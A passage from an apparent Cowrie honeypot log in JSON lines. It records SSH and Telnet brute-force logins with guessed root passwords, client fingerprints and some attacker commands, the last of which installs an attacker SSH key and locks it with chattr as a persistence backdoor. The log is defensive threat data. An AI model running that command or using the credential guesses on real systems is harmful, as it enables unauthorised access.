fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:08:30.756145Z","src_ip":"171.243.150.245","session":"38e1fd49a997"}
{"eventid":"cowrie.login.success","username":"root","password":"alpine","message":"login attempt [root/alpine] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:08:32.487795Z","src_ip":"171.243.150.245","session":"38e1fd49a997"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.245","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T01:08:33.426985Z","session":"38e1fd49a997"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T01:08:33.742085Z","src_ip":"171.243.150.245","session":"38e1fd49a997"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:08:33.952180Z","src_ip":"171.243.150.245","session":"38e1fd49a997"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34360,"dst_ip":"1.2.3.4","dst_port":22,"session":"04770979ecff","protocol":"ssh","message":"New connection: 194.233.79.134:34360 (1.2.3.4:22) [session: 04770979ecff]","sensor":"my-vps","timestamp":"2025-08-28T01:09:11.346451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:09:11.462208Z","src_ip":"194.233.79.134","session":"04770979ecff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:09:11.732082Z","src_ip":"194.233.79.134","session":"04770979ecff"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:09:13.044390Z","src_ip":"194.233.79.134","session":"04770979ecff"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:09:14.886868Z","src_ip":"194.233.79.134","session":"04770979ecff"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":41028,"dst_ip":"1.2.3.4","dst_port":22,"session":"8740c1d37978","protocol":"ssh","message":"New connection: 171.243.150.245:41028 (1.2.3.4:22) [session: 8740c1d37978]","sensor":"my-vps","timestamp":"2025-08-28T01:09:17.041554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:09:17.058552Z","src_ip":"171.243.150.245","session":"8740c1d37978"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:09:17.286379Z","src_ip":"171.243.150.245","session":"8740c1d37978"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"sshd","message":"login attempt [sshd/sshd] failed","sensor":"my-vps","timestamp":"2025-08-28T01:09:18.139082Z","src_ip":"171.243.150.245","session":"8740c1d37978"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:09:19.357665Z","src_ip":"171.243.150.245","session":"8740c1d37978"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37866,"dst_ip":"1.2.3.4","dst_port":22,"session":"3929747cdc5f","protocol":"ssh","message":"New connection: 212.227.125.160:37866 (1.2.3.4:22) [session: 3929747cdc5f]","sensor":"my-vps","timestamp":"2025-08-28T01:09:22.788282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:09:22.942032Z","src_ip":"212.227.125.160","session":"3929747cdc5f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:09:23.024109Z","src_ip":"212.227.125.160","session":"3929747cdc5f"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"sshd","message":"login attempt [sshd/sshd] failed","sensor":"my-vps","timestamp":"2025-08-28T01:09:24.773687Z","src_ip":"212.227.125.160","session":"3929747cdc5f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:09:26.057349Z","src_ip":"212.227.125.160","session":"3929747cdc5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33455,"dst_ip":"1.2.3.4","dst_port":23,"session":"306fe8b67525","protocol":"telnet","message":"New connection: 212.227.235.229:33455 (1.2.3.4:23) [session: 306fe8b67525]","sensor":"my-vps","timestamp":"2025-08-28T01:09:58.096482Z"}
{"eventid":"cowrie.session.closed","duration":31.380797624588013,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:10:29.477208Z","src_ip":"212.227.235.229","session":"306fe8b67525"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":46058,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bd67b80f8d0","protocol":"ssh","message":"New connection: 194.233.79.134:46058 (1.2.3.4:22) [session: 0bd67b80f8d0]","sensor":"my-vps","timestamp":"2025-08-28T01:10:44.102713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:10:44.104041Z","src_ip":"194.233.79.134","session":"0bd67b80f8d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:10:44.468108Z","src_ip":"194.233.79.134","session":"0bd67b80f8d0"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:10:50.136037Z","src_ip":"194.233.79.134","session":"0bd67b80f8d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:10:51.445920Z","src_ip":"194.233.79.134","session":"0bd67b80f8d0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:10:51.446610Z","src_ip":"194.233.79.134","session":"0bd67b80f8d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:10:52.134303Z","src_ip":"194.233.79.134","session":"0bd67b80f8d0"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:10:52.135429Z","src_ip":"194.233.79.134","session":"0bd67b80f8d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15864,"dst_ip":"1.2.3.4","dst_port":22,"session":"55685875e96b","protocol":"ssh","message":"New connection: 212.227.235.229:15864 (1.2.3.4:22) [session: 55685875e96b]","sensor":"my-vps","timestamp":"2025-08-28T01:11:24.457421Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T01:11:24.458452Z","src_ip":"212.227.235.229","session":"55685875e96b"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:11:24.459174Z","src_ip":"212.227.235.229","session":"55685875e96b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19376,"dst_ip":"1.2.3.4","dst_port":22,"session":"40793ad4bd84","protocol":"ssh","message":"New connection: 212.227.125.160:19376 (1.2.3.4:22) [session: 40793ad4bd84]","sensor":"my-vps","timestamp":"2025-08-28T01:11:24.639299Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15880,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbbdc8a06e8c","protocol":"ssh","message":"New connection: 212.227.235.229:15880 (1.2.3.4:22) [session: cbbdc8a06e8c]","sensor":"my-vps","timestamp":"2025-08-28T01:11:24.893265Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xb3\\x82\u0006\\xe2J\\xf2\u001c\\xa1\\x95\u1f7c\\x9dW\u0016\\xa4E\\xf2=\\xc2*2#u\\xed4\u0013\\xb8\u000b\u0003L\\xf7\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xb3\\x82\u0006\\xe2J\\xf2\u001c\\xa1\\x95\u1f7c\\x9dW\u0016\\xa4E\\xf2=\\xc2*2#u\\xed4\u0013\\xb8\u000b\u0003L\\xf7\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T01:11:24.894053Z","src_ip":"212.227.235.229","session":"cbbdc8a06e8c"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:11:24.895060Z","src_ip":"212.227.235.229","session":"cbbdc8a06e8c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:11:26.789544Z","src_ip":"212.227.125.160","session":"40793ad4bd84"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:11:26.790298Z","src_ip":"212.227.125.160","session":"40793ad4bd84"}
{"eventid":"cowrie.login.success","username":"root","password":"Ubuntu2016!","message":"login attempt [root/Ubuntu2016!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:11:37.024660Z","src_ip":"212.227.125.160","session":"40793ad4bd84"}
{"eventid":"cowrie.session.closed","duration":"16.7","message":"Connection lost after 16.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:11:41.327244Z","src_ip":"212.227.125.160","session":"40793ad4bd84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41584,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2c10f9d65be","protocol":"ssh","message":"New connection: 212.227.125.160:41584 (1.2.3.4:22) [session: b2c10f9d65be]","sensor":"my-vps","timestamp":"2025-08-28T01:11:41.386937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:11:41.391629Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-28T01:11:41.447144Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.login.success","username":"root","password":"Ubuntu2016!","message":"login attempt [root/Ubuntu2016!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:11:41.687477Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43454,"dst_ip":"1.2.3.4","dst_port":23,"session":"c42182a80d78","protocol":"telnet","message":"New connection: 212.227.235.229:43454 (1.2.3.4:23) [session: c42182a80d78]","sensor":"my-vps","timestamp":"2025-08-28T01:11:51.519934Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:11:51.717222Z","src_ip":"212.227.235.229","session":"c42182a80d78"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:11:51.736791Z","src_ip":"212.227.235.229","session":"c42182a80d78"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:11:55.611809Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.612594Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
